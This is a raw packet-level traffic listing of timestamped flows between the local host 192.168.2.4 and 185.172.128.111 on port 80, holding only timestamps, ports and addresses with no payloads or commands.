Apr 23, 2024 09:27:07.700918913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.700943947 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.700962067 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.700982094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.700999022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.701019049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.701040030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.701056004 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.701076984 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.701092958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.701107979 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.701133013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.701150894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.701178074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.701199055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.701219082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.701239109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.701256037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.701270103 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.701293945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.701308966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.701333046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.701349020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.701370955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.701394081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.701407909 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.701425076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.701445103 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.701458931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.701483011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.701500893 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.701522112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.701539993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.701574087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.745915890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.745975971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.746014118 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.746053934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.746052027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.746090889 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.746112108 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.746129036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.746165991 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.746203899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.746241093 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.746279955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.746342897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.746344090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.746344090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.748503923 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.748544931 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.748725891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.748725891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801018000 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801060915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801115036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801151037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801196098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801211119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801211119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801211119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801211119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801234007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801275969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801292896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801292896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801331997 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801358938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801369905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801383018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801408052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801414967 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801457882 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801493883 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801503897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801503897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801528931 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801557064 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801565886 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801578045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801604033 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801634073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801641941 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801656961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801678896 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801693916 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801728964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801738977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801765919 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801770926 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801801920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801810026 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801837921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801853895 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801876068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801892042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801912069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801928043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801949024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801963091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.801985025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.801991940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.802021027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.802046061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.802056074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.802073956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.802093983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.802103996 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.802144051 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.812377930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.812417984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.812551975 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.812551975 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852159977 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852227926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852243900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852264881 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852302074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852305889 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852305889 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852339029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852344036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852375984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852399111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852413893 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852422953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852451086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852463961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852488995 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852510929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852526903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852530956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852562904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852570057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852598906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852607012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852634907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852647066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852672100 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852680922 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852708101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852716923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852761030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852785110 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852796078 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852818012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852832079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852840900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852868080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852880001 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852905035 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852916002 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852956057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.852962017 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.852998972 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.853054047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.853218079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.853218079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.853218079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.853790045 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.853827000 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.853835106 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.853863001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.853878975 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.853900909 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.853904963 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.853943110 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.854182959 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.854222059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.854235888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.854264975 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.854576111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.854612112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.854630947 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.854650021 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.854650021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.854687929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.854701042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.854723930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.854743004 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.854759932 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.854768991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.854798079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.854813099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.854834080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.854852915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.854870081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.854872942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.854907036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.854918003 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.854943037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.854950905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.854979038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.854993105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.855015039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.855051041 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.855057001 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.855057955 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.855087996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.855091095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.855123997 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.855129957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.855159998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.855173111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.855196953 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.855211020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.855233908 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.855252028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.855271101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.855277061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.855308056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.855319023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.855350018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.903832912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.903872967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.904036045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.904036045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.904545069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.904582977 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.904618979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.904654980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.904690027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.904726982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.904762983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.904798031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.904803991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.904804945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.904804945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.904804945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.904804945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.904804945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.904804945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.904835939 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.904871941 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.904910088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.904937983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.904937983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.904937983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.904949903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.904973984 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.904985905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.904994011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.905025005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.905035019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.905061960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.905075073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.905098915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.905119896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.905143023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.905154943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.905193090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.905205965 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.905229092 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.905245066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.905271053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.905282021 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.905353069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.906981945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907018900 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907043934 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907057047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907063961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907094002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907107115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907130957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907144070 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907167912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907181025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907206059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907218933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907243013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907254934 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907282114 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907295942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907319069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907339096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907355070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907362938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907392025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907411098 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907428026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907438993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907464981 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907486916 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907501936 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907507896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907538891 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907543898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907577991 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907596111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907615900 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907634020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907653093 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907664061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907689095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907701969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907725096 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907738924 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907762051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907777071 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907798052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907810926 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907835960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907845020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907872915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907883883 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907908916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.907917976 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.907957077 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.952228069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.952295065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.952334881 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.952372074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.952408075 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.952447891 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.952455997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.952456951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.952456951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.952456951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.952456951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.952485085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.952527046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.952539921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.952539921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.952564001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.952585936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.952605963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.952625990 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.952666998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.954297066 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.954335928 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.954469919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.954469919 CEST	49730	80	192.168.2.4	185.172.128.111
